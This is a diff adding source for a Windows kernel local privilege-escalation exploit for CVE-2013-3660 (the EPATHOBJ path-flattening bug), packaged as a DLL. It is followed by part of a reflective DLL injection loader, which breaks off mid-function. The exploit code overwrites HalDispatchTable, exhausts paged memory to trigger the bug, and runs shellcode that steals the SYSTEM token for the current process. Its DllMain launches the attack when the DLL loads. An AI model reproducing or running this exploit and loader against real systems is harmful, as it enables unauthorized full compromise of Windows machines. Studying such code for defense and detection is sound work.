+// INSTRUCTIONS
+//
+// C:\> cl ComplexPath.c
+// C:\> ComplexPath
+//
+// You might need to run it several times before we get the allocation we need,
+// it won't crash if it doesn't work, so you can keep trying. I'm not sure how
+// to improve that.
+//
+// CREDIT
+//
+// Tavis Ormandy <taviso@cmpxchg8b.com>
+// progmboy <programmeboy@gmail.com>
+//
+
+#ifndef _NTDEF_
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+#endif
+
+#ifndef PAGE_SIZE
+# define PAGE_SIZE 0x1000
+#endif
+
+
+// Search the specified data structure for a member with CurrentValue.
+BOOL FindAndReplaceMember(PDWORD Structure,
+                          DWORD CurrentValue,
+                          DWORD NewValue,
+                          DWORD MaxSize)
+{
+    DWORD i, Mask;
+
+    // Microsoft QWORD aligns object pointers, then uses the lower three
+    // bits for quick reference counting.
+    Mask = ~7;
+
+    // Mask out the reference count.
+    CurrentValue &= Mask;
+
+    // Scan the structure for any occurrence of CurrentValue.
+    for (i = 0; i < MaxSize; i++) {
+        if ((Structure[i] & Mask) == CurrentValue) {
+            // And finally, replace it with NewValue.
+            Structure[i] = NewValue;
+            return TRUE;
+        }
+    }
+
+    // Member not found.
+    return FALSE;
+}
+
+
+// This routine is injected into nt!HalDispatchTable by EPATHOBJ::pprFlattenRec.
+ULONG __stdcall ShellCode(DWORD Arg1, DWORD Arg2, DWORD Arg3, DWORD Arg4)
+{
+    PVOID  TargetProcess;
+
+    // Record that the exploit completed.
+    ComplexPathFinished = 1;
+
+    // Fix the corrupted HalDispatchTable,
+    HalDispatchTable[1] = HalQuerySystemInformation;
+
+    // Find the EPROCESS structure for the process I want to escalate
+    if (PsLookupProcessByProcessId(TargetPid, &TargetProcess) == STATUS_SUCCESS) {
+        PACCESS_TOKEN SystemToken;
+        PACCESS_TOKEN TargetToken;
+
+        // Find the Token object for my target process, and the SYSTEM process.
+        TargetToken = (PACCESS_TOKEN) PsReferencePrimaryToken(TargetProcess);
+        SystemToken = (PACCESS_TOKEN) PsReferencePrimaryToken(*PsInitialSystemProcess);
+
+        // Find the token in the target process, and replace with the system token.
+        FindAndReplaceMember((PDWORD) TargetProcess,
+                             (DWORD)  TargetToken,
+                             (DWORD)  SystemToken,
+                             0x200);
+    }
+
+    return 0;
+}
+
+DWORD WINAPI WatchdogThread(LPVOID Parameter)
+{
+    // Here we wait for the main thread to get stuck inside FlattenPath().
+    WaitForSingleObject(Mutex, CYCLE_TIMEOUT);
+
+    // It looks like we've taken control of the list, and the main thread
+    // is spinning in EPATHOBJ::bFlatten. We can't continue because
+    // EPATHOBJ::pprFlattenRec exit's immediately if newpathrec() fails.
+
+    // So first, we clean up and make sure it can allocate memory.
+    while (ComplexPathNumRegion) DeleteObject(Regions[--ComplexPathNumRegion]);
+
+    // Now we switch out the Next pointer for our exploit record. As soon
+    // as this completes, the main thread will stop spinning and continue
+    // into EPATHOBJ::pprFlattenRec.
+    InterlockedExchangePointer(&PathRecord->next,
+                               &ExploitRecord);
+    return 0;
+}
+
+// I use this routine to generate a table of acceptable stub addresses. The
+// 0x40 offset is the location of the PULONG parameter to
+// nt!NtQueryIntervalProfile. Credit to progmboy for coming up with this clever
+// trick.
+VOID __declspec(naked) HalDispatchRedirect(VOID)
+{
+    __asm inc eax
+    __asm jmp dword ptr [ebp+0x40]; //  0
+    __asm inc ecx
+    __asm jmp dword ptr [ebp+0x40]; //  1
+    __asm inc edx
+    __asm jmp dword ptr [ebp+0x40]; //  2
+    __asm inc ebx
+    __asm jmp dword ptr [ebp+0x40]; //  3
+    __asm inc esi
+    __asm jmp dword ptr [ebp+0x40]; //  4
+    __asm inc edi
+    __asm jmp dword ptr [ebp+0x40]; //  5
+    __asm dec eax
+    __asm jmp dword ptr [ebp+0x40]; //  6
+    __asm dec ecx
+    __asm jmp dword ptr [ebp+0x40]; //  7
+    __asm dec edx
+    __asm jmp dword ptr [ebp+0x40]; //  8
+    __asm dec ebx
+    __asm jmp dword ptr [ebp+0x40]; //  9
+    __asm dec esi
+    __asm jmp dword ptr [ebp+0x40]; // 10
+    __asm dec edi
+    __asm jmp dword ptr [ebp+0x40]; // 11
+
+    // Mark end of table.
+    __asm {
+        _emit 0
+        _emit 0
+        _emit 0
+        _emit 0
+    }
+}
+
+VOID elevator_complex_path()
+{
+    HANDLE               Thread;
+    HDC                  Device;
+    ULONG                Size;
+    ULONG                PointNum;
+    HMODULE              KernelHandle;
+    PULONG               DispatchRedirect;
+    PULONG               Interval;
+    ULONG                SavedInterval;
+    RTL_PROCESS_MODULES  ModuleInfo;
+
+    LogMessage(L_INFO, "\r--------------------------------------------------\n"
+                       "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
+                       "\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
+                       "\n");
+    NtQueryIntervalProfile    = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
+    NtQuerySystemInformation  = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
+    Mutex                     = CreateMutex(NULL, FALSE, NULL);
+    DispatchRedirect          = (PVOID) HalDispatchRedirect;
+    Interval                  = (PULONG) ShellCode;
+    SavedInterval             = Interval[0];
+    //TargetPid = (PULONG)2032;
+	TargetPid                 = (PULONG)GetCurrentProcessId();
+
+    LogMessage(L_INFO, "NtQueryIntervalProfile@%p", NtQueryIntervalProfile);
+    LogMessage(L_INFO, "NtQuerySystemInformation@%p", NtQuerySystemInformation);
+
+    // Lookup the address of system modules.
+    NtQuerySystemInformation(SystemModuleInformation,
+                             &ModuleInfo,
+                             sizeof ModuleInfo,
+                             NULL);
+
+    LogMessage(L_DEBUG, "NtQuerySystemInformation() => %s@%p",
+                        ModuleInfo.Modules[0].FullPathName,
+                        ModuleInfo.Modules[0].ImageBase);
+
+    // Lookup some system routines we require.
+    KernelHandle                = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
+    HalDispatchTable            = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable")           - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+    PsInitialSystemProcess      = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess")     - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+    PsReferencePrimaryToken     = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken")    - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+    PsLookupProcessByProcessId  = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase;
+
+    // Search for a ret instruction to install in the damaged HalDispatchTable.
+    HalQuerySystemInformation   = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
+                                - (ULONG) KernelHandle
+                                + (ULONG) ModuleInfo.Modules[0].ImageBase;
+
+    LogMessage(L_INFO, "Discovered a ret instruction at %p", HalQuerySystemInformation);
+
+    // Create our PATHRECORD in user space we will get added to the EPATHOBJ
+    // pathrecord chain.
+    PathRecord = VirtualAlloc(NULL,
+                              sizeof *PathRecord,
+                              MEM_COMMIT | MEM_RESERVE,
+                              PAGE_EXECUTE_READWRITE);
+
+    LogMessage(L_INFO, "Allocated userspace PATHRECORD@%p", PathRecord);
+
+    // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
+    // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
+    // loop in EPATHOBJ::bFlatten().
+    PathRecord->flags   = 0;
+    PathRecord->next    = PathRecord;
+    PathRecord->prev    = (PPATHRECORD)(0x42424242);
+
+    LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
+    LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
+    LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);
+
+    // Now we need to create a PATHRECORD at an address that is also a valid
+    // x86 instruction, because the pointer will be interpreted as a function.
+    // I've created a list of candidates in DispatchRedirect.
+    LogMessage(L_INFO, "Searching for an available stub address...");
+
+    // I need to map at least two pages to guarantee the whole structure is
+    // available.
+    while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1),
+                         PAGE_SIZE * 2,
+                         MEM_COMMIT | MEM_RESERVE,
+                         PAGE_EXECUTE_READWRITE)) {
+    //while (!VirtualAlloc(*DispatchRedirect & ~(0x1000 - 1),
+    //                     0x1000 * 2,
+    //                     MEM_COMMIT | MEM_RESERVE,
+    //                     PAGE_EXECUTE_READWRITE)) {
+
+        LogMessage(L_WARN, "\tVirtualAlloc(%#x) => %#x",
+                            *DispatchRedirect & ~(PAGE_SIZE - 1),
+                            GetLastError());
+
+        // This page is not available, try the next candidate.
+        if (!*++DispatchRedirect) {
+            LogMessage(L_ERROR, "No redirect candidates left, sorry!");
+            return;
+        }
+    }
+
+    LogMessage(L_INFO, "Success, ExploitRecordExit@%#0x", *DispatchRedirect);
+
+    // This PATHRECORD must terminate the list and recover.
+    ExploitRecordExit           = (PPATHRECORD) *DispatchRedirect;
+    ExploitRecordExit->next     = NULL;
+    ExploitRecordExit->prev     = NULL;
+    ExploitRecordExit->flags    = PD_BEGINSUBPATH;
+    ExploitRecordExit->count    = 0;
+
+    LogMessage(L_INFO, "  ->next  @ %p", ExploitRecordExit->next);
+    LogMessage(L_INFO, "  ->prev  @ %p", ExploitRecordExit->prev);
+    LogMessage(L_INFO, "  ->flags @ %u", ExploitRecordExit->flags);
+
+    // This is the second stage PATHRECORD, which causes a fresh PATHRECORD
+    // allocated from newpathrec to nt!HalDispatchTable. The Next pointer will
+    // be copied over to the new record. Therefore, we get
+    //
+    // nt!HalDispatchTable[1] = &ExploitRecordExit.
+    //
+    // So we make &ExploitRecordExit a valid sequence of instuctions here.
+    LogMessage(L_INFO, "ExploitRecord@%#0x", &ExploitRecord);
+
+    ExploitRecord.next          = (PPATHRECORD) *DispatchRedirect;
+    ExploitRecord.prev          = (PPATHRECORD) &HalDispatchTable[1];
+    ExploitRecord.flags         = PD_BEZIERS | PD_BEGINSUBPATH;
+    ExploitRecord.count         = 4;
+
+    LogMessage(L_INFO, "  ->next  @ %p", ExploitRecord.next);
+    LogMessage(L_INFO, "  ->prev  @ %p", ExploitRecord.prev);
+    LogMessage(L_INFO, "  ->flags @ %u", ExploitRecord.flags);
+
+    LogMessage(L_INFO, "Creating complex bezier path with %x", (ULONG)(PathRecord) >> 4);
+
+    // Generate a large number of Belier Curves made up of pointers to our
+    // PATHRECORD object.
+    for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
+        Points[PointNum].x      = (ULONG)(PathRecord) >> 4;
+        Points[PointNum].y      = (ULONG)(PathRecord) >> 4;
+        PointTypes[PointNum]    = PT_BEZIERTO;
+    }
+
+    // Switch to a dedicated desktop so we don't spam the visible desktop with
+    // our Lines (Not required, just stops the screen from redrawing slowly).
+    SetThreadDesktop(CreateDesktop("DontPanic",
+                                   NULL,
+                                   NULL,
+                                   0,
+                                   GENERIC_ALL,
+                                   NULL));
+
+    // Get a handle to this Desktop.
+    Device = GetDC(NULL);
+
+    // Take ownership of Mutex
+    WaitForSingleObject(Mutex, INFINITE);
+
+    // Spawn a thread to cleanup
+    Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);
+
+    LogMessage(L_INFO, "Begin CreateRoundRectRgn cycle");
+
+    // We need to cause a specific AllocObject() to fail to trigger the
+    // exploitable condition. To do this, I create a large number of rounded
+    // rectangular regions until they start failing. I don't think it matters
+    // what you use to exhaust paged memory, there is probably a better way.
+    //
+    // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
+    // failure. Seriously, do some damn QA Microsoft, wtf.
+    for (Size = 1 << 26; Size; Size >>= 1) {
+        while (Regions[ComplexPathNumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
+            ComplexPathNumRegion++;
+    }
+
+    LogMessage(L_INFO, "Allocated %u HRGN objects", ComplexPathNumRegion);
+
+    LogMessage(L_INFO, "Flattening curves...");
+
+    for (PointNum = MAX_POLYPOINTS; PointNum && !ComplexPathFinished; PointNum -= 3) {
+        BeginPath(Device);
+        PolyDraw(Device, Points, PointTypes, PointNum);
+        EndPath(Device);
+        FlattenPath(Device);
+        FlattenPath(Device);
+
+        // Test if exploitation succeeded.
+        NtQueryIntervalProfile(ProfileTotalIssues, Interval);
+
+        // Repair any damage.
+        *Interval = SavedInterval;
+
+        EndPath(Device);
+    }
+
+    if (ComplexPathFinished) {
+        LogMessage(L_INFO, "Success...", ComplexPathFinished);
+        //ExitProcess(0);
+		return;
+    }
+
+    // If we reach here, we didn't trigger the condition. Let the other thread know.
+    ReleaseMutex(Mutex);
+    WaitForSingleObject(Thread, INFINITE);
+    ReleaseDC(NULL, Device);
+
+    // Try again...
+    LogMessage(L_ERROR, "No luck, run exploit again (it can take several attempts)");
+    //ExitProcess(1);
+	return;
+}
+
+// A quick logging routine for debug messages.
+BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
+{
+    CHAR Buffer[1024] = {0};
+    va_list Args;
+
+    va_start(Args, Format);
+        vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
+    va_end(Args);
+
+    switch (Level) {
+        case L_DEBUG: dprintf( "[?] %s\n", Buffer); break;
+        case L_INFO:  dprintf( "[+] %s\n", Buffer); break;
+        case L_WARN:  dprintf( "[*] %s\n", Buffer); break;
+        case L_ERROR: dprintf( "[!] %s\n", Buffer); break;
+    }
+
+	//fflush(stdout);
+    //flush(stderr);
+
+    return TRUE;
+}
+extern HINSTANCE hAppInstance;
+BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
+{
+    BOOL bReturnValue = TRUE;
+	switch( dwReason ) 
+    { 
+		case DLL_QUERY_HMODULE:
+			if( lpReserved != NULL )
+				*(HMODULE *)lpReserved = hAppInstance;
+			hAppInstance = hinstDLL;
+			elevator_complex_path();
+			break;
+		case DLL_PROCESS_ATTACH:
+			hAppInstance = hinstDLL;
+			break;
+		case DLL_PROCESS_DETACH:
+		case DLL_THREAD_ATTACH:
+		case DLL_THREAD_DETACH:
+            break;
+    }
+	return bReturnValue;
+}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
new file mode 100755
index 0000000000..594c0b8066
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/dll/src/ReflectiveLoader.c
@@ -0,0 +1,496 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#include "ReflectiveLoader.h"
+//===============================================================================================//
+// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
+HINSTANCE hAppInstance = NULL;
+//===============================================================================================//
+#pragma intrinsic( _ReturnAddress )
+// This function can not be inlined by the compiler or we will not get the address we expect. Ideally 
+// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of 
+// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics 
+// available (and no inline asm available under x64).
+__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)_ReturnAddress(); }
+//===============================================================================================//
+
+// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,  
+//         otherwise the DllMain at the end of this file will be used.
+
+// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
+//         otherwise it is assumed you are calling the ReflectiveLoader via a stub.
+
+// This is our position independent reflective DLL loader/injector
+#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
+#else
+DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
+#endif
+{
+	// the functions we need
+	LOADLIBRARYA pLoadLibraryA     = NULL;
+	GETPROCADDRESS pGetProcAddress = NULL;
+	VIRTUALALLOC pVirtualAlloc     = NULL;
+	NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL;
+
+	USHORT usCounter;
+
+	// the initial location of this image in memory
+	ULONG_PTR uiLibraryAddress;
+	// the kernels base address and later this images newly loaded base address
+	ULONG_PTR uiBaseAddress;
+
+	// variables for processing the kernels export table
+	ULONG_PTR uiAddressArray;
+	ULONG_PTR uiNameArray;
+	ULONG_PTR uiExportDir;
+	ULONG_PTR uiNameOrdinals;
+	DWORD dwHashValue;
+
+	// variables for loading this image
+	ULONG_PTR uiHeaderValue;
+	ULONG_PTR uiValueA;
+	ULONG_PTR uiValueB;
+	ULONG_PTR uiValueC;
+	ULONG_PTR uiValueD;
+	ULONG_PTR uiValueE;
+
+	// STEP 0: calculate our images current base address
+
+	// we will start searching backwards from our callers return address.
+	uiLibraryAddress = caller();
+
+	// loop through memory backwards searching for our images base address
+	// we dont need SEH style search as we shouldnt generate any access violations with this
+	while( TRUE )
+	{
+		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
+		{
+			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
+			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
+			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
+			{
+				uiHeaderValue += uiLibraryAddress;
+				// break if we have found a valid MZ/PE header
+				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
+					break;
+			}
+		}
+		uiLibraryAddress--;
+	}
+
+	// STEP 1: process the kernels exports for the functions our loader needs...
+
+	// get the Process Enviroment Block
+#ifdef WIN_X64
+	uiBaseAddress = __readgsqword( 0x60 );
+#else
+#ifdef WIN_X86
+	uiBaseAddress = __readfsdword( 0x30 );
+#else WIN_ARM
+	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
+#endif
+#endif
+
+	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
+	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
+
+	// get the first entry of the InMemoryOrder module list
+	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
+	while( uiValueA )
+	{
+		// get pointer to current modules name (unicode string)
+		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
+		// set bCounter to the length for the loop
+		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
+		// clear uiValueC which will store the hash of the module name
+		uiValueC = 0;
+
+		// compute the hash of the module name...
+		do
+		{
+			uiValueC = ror( (DWORD)uiValueC );
+			// normalize to uppercase if the madule name is in lowercase
+			if( *((BYTE *)uiValueB) >= 'a' )
+				uiValueC += *((BYTE *)uiValueB) - 0x20;
+			else
+				uiValueC += *((BYTE *)uiValueB);
+			uiValueB++;
+		} while( --usCounter );
+
+		// compare the hash with that of kernel32.dll
+		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+			// get the VA of the export directory
+			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+			// get the VA for the array of name pointers
+			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
+			
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
+
+			usCounter = 3;
+
+			// loop while we still have imports to find
+			while( usCounter > 0 )
+			{
+				// compute the hash values for this function name
+				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
+				
+				// if we have found a function we want we get its virtual address
+				if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+					// store this functions VA
+					if( dwHashValue == LOADLIBRARYA_HASH )
+						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+					else if( dwHashValue == GETPROCADDRESS_HASH )
+						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+					else if( dwHashValue == VIRTUALALLOC_HASH )
+						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+			
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
+		{
+			// get this modules base address
+			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
+
+			// get the VA of the modules NT Header
+			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
+
+			// uiNameArray = the address of the modules export directory entry
+			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+			// get the VA of the export directory
+			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+			// get the VA for the array of name pointers
+			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
+			
+			// get the VA for the array of name ordinals
+			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
+
+			usCounter = 1;
+
+			// loop while we still have imports to find
+			while( usCounter > 0 )
+			{
+				// compute the hash values for this function name
+				dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
+				
+				// if we have found a function we want we get its virtual address
+				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
+				{
+					// get the VA for the array of addresses
+					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
+
+					// use this functions name ordinal as an index into the array of name pointers
+					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+					// store this functions VA
+					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
+						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+
+					// decrement our counter
+					usCounter--;
+				}
+
+				// get the next exported function name
+				uiNameArray += sizeof(DWORD);
+
+				// get the next exported function name ordinal
+				uiNameOrdinals += sizeof(WORD);
+			}
+		}
+
+		// we stop searching when we have found everything we need.
+		if( pLoadLibraryA && pGetProcAddress && pVirtualAlloc && pNtFlushInstructionCache )
+			break;
+
+		// get the next entry
+		uiValueA = DEREF( uiValueA );
+	}
+
+	// STEP 2: load our image into a new permanent location in memory...
+
+	// get the VA of the NT Header for the PE to be loaded
+	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
+	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
+	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+	// we must now copy over the headers
+	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
+	uiValueB = uiLibraryAddress;
+	uiValueC = uiBaseAddress;
+
+	while( uiValueA-- )
+		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
+
+	// STEP 3: load in all of our sections...
+
+	// uiValueA = the VA of the first section
+	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
+	
+	// itterate through all sections, loading them into memory.
+	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+	while( uiValueE-- )
+	{
+		// uiValueB is the VA for this section
+		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
+
+		// uiValueC if the VA for this sections data
+		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
+
+		// copy the section over
+		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
+
+		while( uiValueD-- )
+			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
+
+		// get the VA of the next section
+		uiValueA += sizeof( IMAGE_SECTION_HEADER );
+	}
+
+	// STEP 4: process our images import table...
+
+	// uiValueB = the address of the import directory
+	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
+	
+	// we assume their is an import table to process
+	// uiValueC is the first entry in the import table
+	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+	
+	// itterate through all imports
+	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
+	{
+		// use LoadLibraryA to load the imported module into memory
+		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
+
+		// uiValueD = VA of the OriginalFirstThunk
+		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
+	
+		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
+		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
+
+		// itterate through all imported functions, importing by ordinal if no name present
+		while( DEREF(uiValueA) )
+		{
+			// sanity check uiValueD as some compilers only import by FirstThunk
+			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
+			{
+				// get the VA of the modules NT Header
+				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
+
+				// uiNameArray = the address of the modules export directory entry
+				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
+
+				// get the VA of the export directory
+				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
+
+				// get the VA for the array of addresses
